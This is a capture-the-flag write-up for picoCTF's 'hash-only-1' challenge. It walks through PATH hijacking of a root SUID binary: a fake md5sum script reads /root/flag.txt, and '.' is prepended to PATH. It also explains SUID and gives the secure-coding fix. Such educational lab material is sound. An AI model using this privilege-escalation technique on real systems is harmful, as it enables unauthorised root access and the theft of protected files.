hash-only-1 picoCTF 2025 Solution

Description

1. Step 1Discover the helper call
   strings flaghasher produces hundreds of lines, so always pipe straight into grep rather than scrolling. The hit is /bin/bash -c 'md5sum /root/flag.txt'. The bare md5sum (no leading /) means Linux resolves it via PATH - so you control which binary runs.
   bash

   strings flaghasher | grep md5sum

   Copied!

   bash

   # Output: /bin/bash -c 'md5sum /root/flag.txt'

   Copied!
   Learn more

   PATH injection (also called PATH hijacking) exploits the fact that Linux resolves command names by searching directories listed in the PATH environment variable in order from left to right. When a program calls a command by name without specifying an absolute path (e.g., md5sum instead of /usr/bin/md5sum), the OS finds whatever file named md5sum appears first in PATH.

   The strings command is a first-line static analysis tool. Running it on any SUID binary quickly reveals hardcoded paths, system calls, and - as here - the exact shell command being executed. When that command uses an unqualified binary name (no leading /), PATH injection becomes viable. Real-world SUID binaries have historically been vulnerable to this in many Linux distributions.

   SUID (Set User ID) bits allow a binary to run with the permissions of its owner rather than the permissions of whoever executes it. A SUID binary owned by root runs as root regardless of which user launches it. This makes SUID binaries high-value targets for privilege escalation - any vulnerability in them potentially grants root access. Modern systems minimize SUID binaries and use capabilities or sudo policies instead.

2. Step 2Drop in a fake md5sum
   Write a one-line md5sum that cats the flag, chmod +x, prepend . to PATH, and verify PATH order before running flaghasher. Critically, the fake script must NOT call any program named md5sum (no /usr/bin/md5sum, no recursion fallback) or the hijacked PATH will resolve it back to your own script and infinite-loop. If you SSH out and back in, PATH resets - re-export it.
   bash

   echo '/bin/cat /root/flag.txt' > md5sum

   Copied!

   bash

   chmod +x md5sum

   Copied!

   bash

   export PATH=.:$PATH

   Copied!

   bash

   echo $PATH | tr ':' '\n' | head -3   # verify '.' is first

   Copied!

   bash

   ./flaghasher

   Copied!
   Learn more

   Prepending . (the current directory) to PATH is a classic privilege escalation technique. The current directory is never in PATH by default on modern Linux systems specifically because of this attack - if it were, any malicious executable in the current directory would shadow system commands. However, PATH can be freely modified in a shell session, so an attacker who controls PATH can plant fake commands anywhere in the search order.

   The fake md5sum script demonstrates the principle of command substitution: replacing a legitimate system utility with a malicious one. In real penetration testing, this technique is used to establish persistence (replacing cron-invoked scripts), escalate privileges (replacing commands called by SUID binaries), or intercept sensitive data (replacing commands like ssh that handle credentials).

   The correct fix is for flaghasher to use the absolute path /usr/bin/md5sum instead of the bare name md5sum, and to sanitize or reset the PATH environment variable before calling any external commands. This is documented in the POSIX specification and in secure coding guidelines from CERT, MITRE, and CWE-78 (Improper Neutralization of Special Elements used in an OS Command).

Flag

Classic PATH hijacking, so always check PATH order when privileged scripts invoke system tools.